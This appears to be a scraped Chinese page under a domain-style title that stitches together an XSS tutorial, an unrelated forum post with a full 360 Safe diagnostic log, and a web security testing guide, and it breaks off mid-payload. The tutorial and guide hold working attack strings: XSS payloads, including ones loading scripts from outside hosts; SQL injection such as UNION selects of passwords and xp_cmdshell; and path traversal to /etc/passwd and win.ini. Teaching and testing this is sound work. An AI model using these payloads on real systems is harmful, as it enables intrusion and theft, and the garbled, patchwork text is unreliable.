关于69xss..com的信息

今日出生 2022年05月29日
本文导读目录:

xss注入漏洞产生的原因?xss注入过程步骤是什么?防范xss注入的方法有哪些

对于的用户输入中出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心。请记住两条原则:过滤输入和转义输出。

一、什么是XSS

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。

在WEB2.0时代,强调的是互动,使得用户输入信息的机会大增,在这个情况下,我们作为开发者,在开发的时候,要提高警惕。

二、XSS攻击的主要途径

XSS攻击方法只是利用HTML的属性,作各种的尝试,找出注入的方法。现在对三种主要方式进行分析。

第一种:对普通的用户输入,页面原样内容输出。

打开http://go.ent.163.com/goproducttest/test.jsp(限公司IP),输 入:scriptalert(‘xss’)/script, JS脚本顺利执行。当攻击者找到这种方法后,就可以传播这种链接格式的链接 (http://go.ent.163.com/goproducttest/test.jsp?key=JSCODE)如:http: //go.ent.163.com/goproducttest/test.jsp?key=scriptalert(‘xss’) lt;/script,并对JSCODE做适当伪装,如:

http://go.ent.163.com/goproducttest/test.jsp?key=%3c%73%63%72%69%70 %74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c%2f%73%63%72%69%70%74%3e,当其 它用户当点此链接的时候,JS就运行了,造成的后果会很严重,如跳去一个有木马的页面、取得登陆用户的COOKIE等。

第二种:在代码区里有用户输入的内容

原则就是,代码区中,绝对不应含有用户输入的东西。

第三种:允许用户输入HTML标签的页面。

用户可以提交一些自定义的HTML代码,这种情况是最危险的。因为,IE浏览器默认采用的是UNICODE编码,HTML编码可以用ASCII方式来写,又可以使用”/”连接16进制字符串来写,使得过滤变得异常复杂,如下面的四个例子,都可以在IE中运行。

1,直接使用JS脚本。

img src=”javascript:alert(‘xss’)” /

2,对JS脚本进行转码。

img src=”javascript:alert(‘xss’)” /

3,利用标签的触发条件插入代码并进行转码。

img onerror=”alert(‘xss’)” /

4,使用16进制来写(可以在傲游中运行)

img STYLE=”background-image: /75/72/6c/28/6a/61/76/61/73/63/72/69/70/74/3a/61/6c/65/72/74/28/27/58/53/53/27/29/29″

以上写法等于img STYLE=”background-image: url(javascript:alert(‘XSS’))”

三、XSS攻击解决办法

请记住两条原则:过滤输入和转义输出。

具体执行的方式有以下几点:

第一、在输入方面对所有用户提交内容进行可靠的输入验证,提交内容包括URL、查询关键字、http头、post数据等

第二、在输出方面,在用户输内容中使用XMP标签。标签内的内容不会解释,直接显示。

第三、严格执行字符输入字数控制。

四、在脚本执行区中,应绝无用户输入。

方正奇迹1.02Q

方正奇迹1.02Q

帖子标题:

方正奇迹1.02Q

帖子内容:

现象:

历史操作:没有就是卸载不了就是卸载不了就是卸载不了就是卸载不了

备注: 就是卸载不了

我的诊断报告:

各位高手:

非常感谢您留心我这份系统诊断报告,小菜鸟十万火急等待您的帮助!

该诊断报告由360安全卫士提供 http://www.360safe.com

诊断时间: 2007-07-11 12:34:03

诊断平台: Windows Vista (TM) Home Premium

IE版本: Internet Explorer V7.0.6000.16473 Build:76000

计算机物理内存:509.87MB - 当前可用内存:153.96MB

100 - 未知 - Process: lsm.exe [本地会话管理器服务] -

100 - 未知 - Process: audiodg.exe [] -

100 - 未知 - Process: ccSvcHst.exe [Symantec Service Framework] -

100 - 未知 - Process: AppSvc32.exe [Symantec Application Core Service] -

100 - 未知 - Process: SearchIndexer.exe [Microsoft Windows Search Indexer] -

100 - 未知 - Process: mscorsvw.exe [.NET Runtime Optimization Service] -

100 - 未知 - Process: hpsysdrv.exe [hpsysdrv] -

100 - 未知 - Process: wpcumi.exe [Windows 家长控制通知] -

100 - 未知 - Process: wmpnscfg.exe [Windows Media Player 网络共享服务配置应用程序] -

100 - 未知 - Process: HP Connections.exe [HP Connections] -

100 - 未知 - Process: QQMusic.exe [QQ音乐7.1] -

100 - 未知 - Process: SearchProtocolHost.exe [Microsoft Windows Search Protocol Host] -

100 - 未知 - Process: SearchFilterHost.exe [Microsoft Windows Search Filter Host] -

O2 - 未知 - BHO: (浏览器辅助对象(BHO)) - [NcoBHO] - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - c:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.0\NppBho.dll

O3 - 未知 - Toolbar: (显示 Norton 工具栏) - [UIBhoImpl] - {90222687-F593-4738-B738-FBEE9C7B26DF} - c:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.0\UIBHO.dll

O4 - 未知 - HKLM\..\Run: [Windows Defender] [] C:\Program Files\Windows Defender\MSASCui.exe -hide

O4 - 未知 - HKLM\..\Run: [osCheck] [osCheck] "c:\Program Files\Norton Internet Security\osCheck.exe"

O4 - 未知 - HKLM\..\Run: [NvSvc] [NVIDIA Driver Helper Service, Version 97.52] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart

O4 - 未知 - HKLM\..\Run: [WPCUMI] [Windows 家长控制通知] C:\Windows\system32\WpcUmi.exe

O4 - 未知 - HKCU\..\Run: [ehTray.exe] [Media Center Tray Applet] C:\Windows\ehome\ehTray.exe

O4 - 未知 - HKCU\..\Run: [WMPNSCFG] [Windows Media Player 网络共享服务配置应用程序] C:\Program Files\Windows Media Player\WMPNSCFG.exe

O4 - 未知 - Startup folder: [HP 连接.lnk] [] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP 连接.lnk

O8 - 未知 - Extra context menu item: 使用Web迅雷下载 - F:\迅雷\GetUrl.htm

O8 - 未知 - Extra context menu item: 使用Web迅雷下载全部链接 - F:\迅雷\GetAllUrl.htm

O8 - 未知 - Extra context menu item: 收藏到QQ书签 - http://shuqian.qq.com/favit.html

O8 - 未知 - Extra context menu item: 添加到QQ表情 - F:\qq\AddEmotion.htm

O9 - 未知 - Extra button: 启动Web迅雷(HKLM) - http://my.xunlei.com

O23 - 未知 - Service: ccEvtMgr [Event propagation and logging service] - "c:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon - (running)

O23 - 未知 - Service: ccSetMgr [Settings storage and management service] - "c:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon - (running)

O23 - 未知 - Service: CLTNetCnService [Symantec Lic NetConnect Service] - "c:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon - (running)

O23 - 未知 - Service: comHost [COM aggregation host service] - "c:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe" - (not running)

O23 - 未知 - Service: DPS [@%systemroot%\system32\dps.dll,-501] - C:\Windows\system32\dps.dll - (error)

O23 - 未知 - Service: ehRecvr [@%SystemRoot%\ehome\ehrecvr.exe,-102] - C:\Windows\ehome\ehRecvr.exe - (not running)

O23 - 未知 - Service: ehSched [@%SystemRoot%\ehome\ehsched.exe,-102] - C:\Windows\ehome\ehsched.exe - (not running)

O23 - 未知 - Service: ehstart [@%SystemRoot%\ehome\ehstart.dll,-102] - C:\Windows\ehome\ehstart.dll - (not running)

O23 - 未知 - Service: Eventlog [@%SystemRoot%\system32\wevtsvc.dll,-201] - C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted - (running)

O23 - 未知 - Service: idsvc [@%systemroot%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelInstallRC.dll,-8192] - "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe" - (error)

O23 - 未知 - Service: ISPwdSvc [用户帐户管理服务] - "c:\Program Files\Norton Internet Security\isPwdSvc.exe" - (not running)

O23 - 未知 - Service: LiveUpdate [LiveUpdate 核心引擎] - "C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE" - (not running)

O23 - 未知 - Service: Mcx2Svc [@%SystemRoot%\ehome\ehres.dll,-15502] - C:\Windows\system32\Mcx2Svc.dll - (not running)

O23 - 未知 - Service: MSiSCSI [@%SystemRoot%\system32\iscsidsc.dll,-5001] - C:\Windows\system32\iscsiexe.dll - (not running)

O23 - 未知 - Service: msiserver [@%SystemRoot%\system32\msimsg.dll,-32] - C:\Windows\system32\msiexec /V - (not running)

O23 - 未知 - Service: NetTcpPortSharing [@%systemroot%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelInstallRC.dll,-8200] - "C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe" - (not running)

O23 - 未知 - Service: nsi [@%SystemRoot%\system32\nsisvc.dll,-201] - C:\Windows\system32\nsisvc.dll - (running)

O23 - 未知 - Service: pla [@%systemroot%\system32\pla.dll,-501] - C:\Windows\system32\pla.dll - (not running)

O23 - 未知 - Service: PolicyAgent [@%SystemRoot%\system32\polstore.dll,-5011] - C:\Windows\System32\ipsecsvc.dll - (not running)

O23 - 未知 - Service: SCardSvr [@%SystemRoot%\System32\SCardSvr.dll,-5] - C:\Windows\System32\SCardSvr.dll - (error)

O23 - 未知 - Service: stllssvr [stllssvr] - "c:\Program Files\Common Files\SureThing Shared\stllssvr.exe" - (not running)

O23 - 未知 - Service: SymAppCore [Symantec Application Service] - "c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe" - (running)

O23 - 未知 - Service: WPCSvc [@%SystemRoot%\system32\wpcsvc.dll,-101] - C:\Windows\System32\wpcsvc.dll - (running)

O23 - 未知 - Service: wuauserv [@%systemroot%\system32\wuaueng.dll,-106] - C:\Windows\system32\wuaueng.dll - (running)

O23 - 未知 - Service: 自动 LiveUpdate 调度程序 [管理对自动 LiveUpdate 会话的调度] - "C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe" - (running)

=======================================

100 - 安全 - Process: smss.exe [进程为会话管理子系统用以初始化系统变量,ms-dos驱动名称类似lpt1以及com,调用win32壳子系统和运行在windows登陆过程。] -

100 - 安全 - Process: csrss.exe [客户端服务子系统,用以控制windows图形相关子系统。] -

100 - 安全 - Process: csrss.exe [客户端服务子系统,用以控制windows图形相关子系统。] -

100 - 安全 - Process: wininit.exe [Windows启动应用程序。] -

100 - 安全 - Process: services.exe [用于管理windows服务系统进程。] -

100 - 安全 - Process: winlogon.exe [windows nt用户登陆程序。] -

100 - 安全 - Process: lsass.exe [本地安全权限服务控制windows安全机制。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: SLsvc.exe [微软软件授权服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: LSSrvc.exe [一款名为LightScribe(光雕技术)的刻录机,可以在光盘上光雕个性化图案。] -

100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] -

100 - 安全 - Process: ALUSchedulerSvc.exe [赛门铁克出品的防病毒软件。] -

100 - 安全 - Process: taskeng.exe [Windows任务计划程序引擎。] -

100 - 安全 - Process: taskeng.exe [Windows任务计划程序引擎。] -

100 - 安全 - Process: dwm.exe [Windows桌面窗口管理器。] -

100 - 安全 - Process: explorer.exe [windows program manager或者windows explorer用于控制windows图形shell,包括开始菜单、任务栏,桌面和文件管理。] -

100 - 安全 - Process: MSASCui.exe [微软反间谍软件windows defender的程序。 ] -

100 - 安全 - Process: hpwuSchd2.exe [惠普公司出品的相关产品的更新升级程序。] -

100 - 安全 - Process: ccApp.exe [symantec公用应用客户端包含在norton antivirus 2003和norton personal firewall 2003。] -

100 - 安全 - Process: 360tray.exe [360安全卫士实时保护模块] -

100 - 安全 - Process: ehtray.exe [微软出品的winxp媒体中心软件的相关程序。] -

100 - 安全 - Process: ehmsas.exe [微软出品的winxp媒体中心软件的相关程序。] -

100 - 安全 - Process: rundll32.exe [windows rundll32为了需要调用dlls的程序。] -

100 - 安全 - Process: kbd.exe [惠普公司出品的相关软件。] -

100 - 安全 - Process: symlcsvc.exe [赛门铁克公司软件产品的一部分。] -

100 - 安全 - Process: ieuser.exe [Internet Explorer7用户权限代理程序。] -

100 - 安全 - Process: 360Safe.exe [360安全卫士] -

R0 - 安全 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page=http://go.microsoft.com/fwlink/?LinkId=54896

R0 - 安全 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page=http://go.microsoft.com/fwlink/?LinkId=54896

R0 - 安全 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL=http://go.microsoft.com/fwlink/?LinkId=54896

R1 - 安全 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page=C:\Windows\system32\blank.htm

R1 - 安全 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page=C:\Windows\system32\blank.htm

O2 - 安全 - BHO: (WebThunder Browser Helper) - [Web迅雷, 支持多资源超线程技术的下载工具。] - {00000AAA-A363-466E-BEF5-9BB68697AA7F} - F:\迅雷\WebThunderBHO_Now.dll

O2 - 安全 - BHO: (Adobe PDF Reader Link Helper) - [Adobe Reader, 查看和打印 Adobe 便携文档格式 (PDF) 文件。] - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O4 - 安全 - HKLM\..\Run: [hpsysdrv] [hp公司软件。] c:\hp\support\hpsysdrv.exe

O4 - 安全 - HKLM\..\Run: [KBD] [惠普出品的相关软件。] C:\HP\KBD\KbdStub.EXE

O4 - 安全 - HKLM\..\Run: [HP Software Update] [惠普软件升级程序。] c:\Program Files\HP\HP Software Update\HPWuSchd2.exe

O4 - 安全 - HKLM\..\Run: [ccApp] [诺顿杀毒或诺顿防火墙客户端软件] "c:\Program Files\Common Files\Symantec Shared\ccApp.exe"

O4 - 安全 - HKLM\..\Run: [360Safetray] [360safe实时保护功能模块。] F:\360安全卫士\360safe\safemon\360tray.exe /start

O4 - 安全 - HKLM\..\Run: [NvCplDaemon] [是NVIDIA显示卡相关动态链接库文件。] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup

O4 - 安全 - HKLM\..\Run: [NvMediaCenter] [是NVidia显示卡相关文件。] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit

O4 - 安全 - Startup folder: [Adobe Reader Speed Launch.lnk] [adobe公司出品的pdf处理软件的相关程序。] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Reader Speed Launch.lnk

O8 - 安全 - Extra context menu item: 导出到 Microsoft Office Excel(X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O11 - 安全 - Options Group: International*

O18 - 安全 - Protocol: OFFICE 相关 - {807553E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLMF.DLL

O23 - 安全 - Service: LightScribeService [一个来自dvd刻录机\\\"光雕\\\"软件的相关程序,通过用户许可协议安装。] - "c:\Program Files\Common Files\LightScribe\LSSrvc.exe" - (running)

O23 - 安全 - Service: SNMPTRAP [微软Microsoft Windows操作系统相关程序,用于监听简单网络管理协议SNMP的消息。] - C:\Windows\System32\snmptrap.exe - (not running)

O23 - 安全 - Service: Symantec Core LC [诺顿2006相关服务] - "C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe" - (running)

O25 - 安全 - ABOUT: DesktopItemNavigationFailure - res://ieframe.dll/navcancl.htm

O25 - 安全 - ABOUT: NavigationCanceled - res://ieframe.dll/navcancl.htm

O25 - 安全 - ABOUT: NavigationFailure - res://ieframe.dll/navcancl.htm

O25 - 安全 - ABOUT: OfflineInformation - res://ieframe.dll/offcancl.htm

O25 - 安全 - ABOUT: PostNotCached - res://ieframe.dll/repost.htm

=======================================

O31 - 未知 - Other Autoruns: Kmode - \SystemRoot\System32\win32k.sys - - - - 0 -

O31 - 未知 - Other Autoruns: - C:\Windows\Explorer.exe /separate,/e - - - - 0 -

O31 - 未知 - Folder Menu: {F9DB5320-233E-11D1-9F84-707F02C10627} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll - Adobe Systems, Inc. - PDF Shell Extension - 7.0.0.0 - 110592 - 4b0991cd076b617a2231b19a6663c1c9

O31 - 未知 - SEApproved: {00020d75-0000-0000-c000-000000000046} - - - - - 0 -

O31 - 未知 - SEApproved: {b2c761c6-29bc-4f19-9251-e6195265baf1} - - - - - 0 -

O31 - 未知 - SEApproved: {7A979262-40CE-46ff-AEEE-7884AC3B6136} - - - - - 0 -

O31 - 未知 - SEApproved: {3e7efb4c-faf1-453d-89eb-56026875ef90} - - - - - 0 -

O31 - 未知 - SEApproved: {0DF44EAA-FF21-4412-828E-260A8728E7F1} - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:ActiveDirectory Folder - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:ActiveDirectory Folder - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:Sam Account Folder - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:Sam Account Folder - - - - - 0 -

O31 - 未知 - SEApproved: {5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} - - - - - 0 -

O31 - 未知 - SEApproved: {E44E5D18-0652-4508-A4E2-8A090067BCB0} - - - - - 0 -

O31 - 未知 - SEApproved: {6dfd7c5c-2451-11d3-a299-00c04f8ef6af} - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:Explorer Query Band - - - - - 0 -

O31 - 未知 - SEApproved: {38a98528-6cbf-4ca9-8dc0-b1e1d10f7b1b} - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:Contacts folder - - - - - 0 -

O31 - 未知 - SEApproved: {4026492f-2f69-46b8-b9bf-5654fc07e423} - - - - - 0 -

O31 - 未知 - SEApproved: {fcfeecae-ee1b-4849-ae50-685dcf7717ec} - - - - - 0 -

O31 - 未知 - SEApproved: {a304259d-52b8-4526-8b1a-a1d6cecc8243} - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:.cab or .zip files - - - - - 0 -

O31 - 未知 - SEApproved: 无效的CLSID:Windows Search Shell Service - - - - - 0 -

O31 - 未知 - SEApproved: {d3e34b21-9d75-101a-8c3d-00aa001a1652} - - - - - 0 -

O31 - 未知 - SEApproved: {00f2886f-cd64-4fc9-8ec5-30ef6cdbe8c3} - - - - - 0 -

O31 - 未知 - SEApproved: {9D687A4C-1404-41ef-A089-883B6FBECDE6} - - - - - 0 -

O31 - 未知 - SEApproved: {37efd44d-ef8d-41b1-940d-96973a50e9e0} - - - - - 0 -

O31 - 未知 - SEApproved: {67718415-c450-4f3c-bf8a-b487642dc39b} - - - - - 0 -

O31 - 未知 - SEApproved: {d8559eb9-20c0-410e-beda-7ed416aecc2a} - - - - - 0 -

O31 - 未知 - SEApproved: {5ea4f148-308c-46d7-98a9-49041b1dd468} - - - - - 0 -

O31 - 未知 - SEApproved: {031EE060-67BC-460d-8847-E4A7C5E45A27} - - - - - 0 -

O31 - 未知 - SEApproved: {7dda204b-2097-47c9-8323-c40bb840ae44} - - - - - 0 -

O31 - 未知 - SEApproved: {7A9D77BD-5403-11d2-8785-2E0420524153} - - - - - 0 -

O31 - 未知 - SEApproved: {7F67036B-66F1-411A-AD85-759FB9C5B0DB} - C:\Windows\System32\ShellvRTF.dll - XSS - ShellvRTF - 1.1.0.5 - 237568 - 91fa8d1db1ec243cecd4a0977c91cc6f

O31 - 未知 - SEApproved: {B41DB860-8EE4-11D2-9906-E49FADC173CA} - F:\winrar\rarext.dll - - - - 128512 - 8f52066a5cab69ef0c7786e909689a49

O31 - 未知 - Directory Menu: {B41DB860-8EE4-11D2-9906-E49FADC173CA} - F:\winrar\rarext.dll - - - - 128512 - 8f52066a5cab69ef0c7786e909689a49

O31 - 未知 - LSA: Security Packages - sv1_0.dll - - - - 0 -

O31 - 未知 - LSA: Security Packages - channel.dll - - - - 0 -

O31 - 未知 - LSA: Security Packages - digest.dll - - - - 0 -

O31 - 未知 - LSA: Security Packages - spkg.dll - - - - 0 -

=======================================

O40 - Explorer.EXE - Microsoft Corporation - C:\Windows\system32\MSVCR71.dll - Microsoft? C Runtime Library - 86f1895ae8c5e8b17d99ece768a70732

O40 - Explorer.EXE - Microsoft Corporation - C:\Windows\system32\MSVCP71.dll - Microsoft? C++ Runtime Library - 561fa2abb31dfa8fab762145f81667c2

=======================================

O41 - PxHelp20 - Px Engine Device Driver for Windows 2000/XP - C:\WINDOWS\System32\drivers\pxhelp20.sys - (running) - Px Engine Device Driver for Windows 2000/XP - Sonic Solutions - feffcfdc528764a04c8ed63d5fa6e711

O41 - npkcrypt - npkcrypt - C:\Windows\system32\npkcrypt.sys - (not running) - - -

O41 - npkycryp - npkycryp - C:\Windows\system32\npkycryp.sys - (not running) - - -

=======================================

360Safe.exe=3.5.2.1003

AntiAdwa.dll=3.5.1.1001

AntiEng.dll=3.5.2.1002

AntiActi.dll=2.0.0.3000

CleanHis.dll=3.0.2.1000

live.dll=1.0.1.1017

=======================================

操作历史报告:

----------清理恶评及系统插件历史----------

2007-07-05 21:47

清理恶评软件 - Google工具栏 -

2007-07-05 14:57

清理好评插件 - 中文搜搜 - C:\Program Files\TENCENT\Adplus

清理好评插件 - Google工具栏 - c:\PROGRA~1\google\GOOGLE~2.DLL

2007-07-05 14:58

清理好评插件 - Google工具栏 - c:\PROGRA~1\google\GOOGLE~2.DLL

2007-07-08 23:35

清理好评插件 - 新浪UC -

清理好评插件 - 超级旋风下载组件 -

2007-07-10 21:44

清理好评插件 - 我要地图 桌面版 - C:\Windows\51DITU.INI

----------修复IE浏览器操作历史----------

2007-07-06 00:30

R0 - 危险 - IE首页 - HKCU\Software\Microsoft\Internet Explorer\Main

2007-07-06 17:37

R0 - 危险 - IE首页 - HKCU\Software\Microsoft\Internet Explorer\Main

=======================================

360安全卫士,彻底查杀各种流氓软件,全面保护系统安全,并赠送正版卡巴斯基V6.0

最新免费下载:http://www.360safe.com

如何进行WEB安全性测试

安全性测试主要从以下方面考虑 主要从以下方面考虑: WEB 的安全性测试主要从以下方面考虑: Injection(SQL 注入) 1.SQL Injection(SQL 注入) (1)如何进行 SQL 注入测试? 首先找到带有参数传递的 URL 页面,如 搜索页面,登录页面,提交评论页面等等. 注 1:对 于未明显标识在 URL 中传递参数的,可以通过查看 HTML 源代码中的 "FORM"标签来辨别是否还有参数传递.在FORM 和/FORM的标签中间的每一个 参数传递都有可能被利用. form id="form_search" action="/search/" method="get" div input type="text" name="q" id="search_q" value="" / input name="search" type="image" src="/media/images/site/search_btn.gif" / a href="/search/" class="ebf9-73e7-8a77-53a5 fl"Gamefinder/a /div /form 注 2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的 URL,如 http://DOMAIN/INDEX.ASP?ID=10 其 次,在 URL 参数或表单中加入某些特殊的 SQL 语句或 SQL 片断,如在登 录页面的 URL 中输入 http://DOMAIN /INDEX.ASP?USERNAME=HI' OR 1=1-注 1:根据实际情况,SQL 注入请求可以使用以下语句: ' or 1=1- " or 1=1- or 1=1- ' or 'a'='a " or "a"="a ') or ('a'='a 注 2:为什么是 OR, 以及',――是特殊的字符呢? 例子:在登录时进行身份验证时,通常使用如下语句来进行验证:sql=select * from user where username='username' and pwd='password' 如 输入 http://duck/index.asp?username=admin' admin' or 1='1pwd=11,SQL 语句会变成以下:sql=select 11 1='1 username='admin' or 1='1 and password='11 admin' 1='1' 11' 11 * from user where ' 与 admin 前面的'组成了一个查询条件,即 username='admin',接下来的语句将 按下一个查询条件来执行. 接 下来是 OR 查询条件,OR 是一个逻辑运 算符, 在判断多个条件的时候, 只要一 个成立,则等式就成立,后面的 AND 就不再时行判断了,也就是 说我们绕过了密码 验证,我们只用用户名就可以登录. 如 输入 http://duck/index.asp?username=admin'--pwd=11,SQL 语 admin'-admin'-11 句会 变成以下 sql=select * from user where name='admin' -- and pasword='11', admin' --' 1 '与 admin 前面的'组成了一个查 询条件,即 username='admin',接下来的语句将按 下一个查询条件来执行 接下来是"--"查询条件,“--”是忽略或注释,上 述通过连接符注释掉后面的密码验 证(注:对 ACCESS 数据库 数据库无 效). 最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器 的相关信息;如 果 能说明存在 SQL 安 全漏洞. 试想,如果网站存在 SQL 注入的危险,对于有经验的恶意用户还可能猜出数据库表和表结 构,并对数据库表进行增\删\改的操 作,这样造成的后果是非常严重的. (2)如何预防 SQL 注入? 从应用程序的角度来讲,我们要做以下三项工作 工作: 工作 转义敏感字符及字符串(SQL 的敏感字符包括 “exec”,”xp_”,”sp_”,”declare”,”Union”,”cmd”,”+”,”//”,”..”,”;”,”‘”,”--”,”%”,”0x”,”=!-*/()|”, 和”空格”). 屏蔽出错信息:阻止攻击者知道攻击的结果 在服务端正式处理之前提交数据的合法性(合法性检查主要包括三 项:数据类型,数据长度,敏感 字符的校验)进行检查等。最根本的解决手段,在确认客 户端的输入合法之前,服务端拒绝进行关 键性的处理操作. 从测试人员的角度来讲,在程序开发前(即需求阶段),我们就应该有意识的将 安全性检查应用到需求测试中,例如对一个表单需求进行检查时,我们一般检验 以下几项安全性问题: 需求中应说明表单中某一 FIELD 的类型,长度,以及取值范围(主要作用就 是禁止输入敏感字符) 需求中应说明如果超出表单规定的类型,长度,以及取值范围的,应用程序 应给出不包含任何代码或数据库信息的错误提示. 当然在执行测试的过程中,我们也需求对上述两项内容进行测试. 2.Crossscritping(XSS):(跨站点脚本攻击 跨站点脚本攻击) 2.Cross-site scritping(XSS):(跨站点脚本攻击) (1)如何进行 XSS 测试? !--[if !supportLists]--首先,找到带有参数传递的 URL,如 交评论,发表留言 页面等等。 登录页面,搜索页面,提 !--[if !supportLists]--其次,在页面参数中输入如下语句(如:Javascrīpt,VB scrīpt, HTML,ActiveX, Flash)来进行测试: scrīptalert(document.cookie)/scrīpt 注:其它的 XSS 测试语句 scrīptalert(document.cookie)/scrīpt ='scrīptalert(document.cookie)/scrīpt scrīptalert(document.cookie)/scrīpt scrīptalert(vulnerable)/scrīpt %3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E scrīptalert('XSS')/scrīpt img src="javascrīpt:alert('XSS')" %0a%0ascrīptalert(\"Vulnerable\")/scrīpt.jsp %22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html %3f.jsp %3f.jsp scrīptalert('Vulnerable');/scrīptgt scrīptalert('Vulnerable')/scrīpt ?sql_debug=1 a%5c.aspx a.jsp/scrīptalert('Vulnerable')/scrīpt a/ a?scrīptalert('Vulnerable')/scrīpt "scrīptalert('Vulnerable')/scrīpt ';exec%20master..xp_cmdshell%20'dir%20 c:%20%20c:\inetpub\wwwroot\?.txt'-- %22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E %3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E %3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3ESESSION_ID={SESSION_ID}SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"XSS={()} IMG SRC="javascrīpt:alert('XSS');" IMG SRC=javascrīpt:alert('XSS') IMG SRC=javascrīpt:alert('XSS') IMG SRC=javascrīpt:alert("XSS") IMG SRC=javascrīpt:alert('XSS') IMG SRC=javascrīpt:alert('XSS') IMG SRC="jav ascrīpt:alert('XSS');" IMG SRC="jav ascrīpt:alert('XSS');" IMG SRC="jav ascrīpt:alert('XSS');" "IMG SRC=java\0scrīpt:alert(\"XSS\")";' out IMG SRC=" javascrīpt:alert('XSS');" scrīpta=/XSS/alert(a.source)/scrīpt BODY BACKGROUND="javascrīpt:alert('XSS')" BODY ōNLOAD=alert('XSS') IMG DYNSRC="javascrīpt:alert('XSS')" IMG LOWSRC="javascrīpt:alert('XSS')" BGSOUND SRC="javascrīpt:alert('XSS');" br size="{alert('XSS')}" LAYER SRC="http://xss.ha.ckers.org/a.js"/layer LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');" IMG SRC='vbscrīpt:msgbox("XSS")' IMG SRC="mocha:[code]" IMG SRC="livescrīpt:[code]" META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');" IFRAME SRC=javascrīpt:alert('XSS')/IFRAME FRAMESETFRAME SRC=javascrīpt:alert('XSS')/FRAME/FRAMESET TABLE BACKGROUND="javascrīpt:alert('XSS')" DIV STYLE="background-image: url(javascrīpt:alert('XSS'))" DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');" DIV STYLE="width: 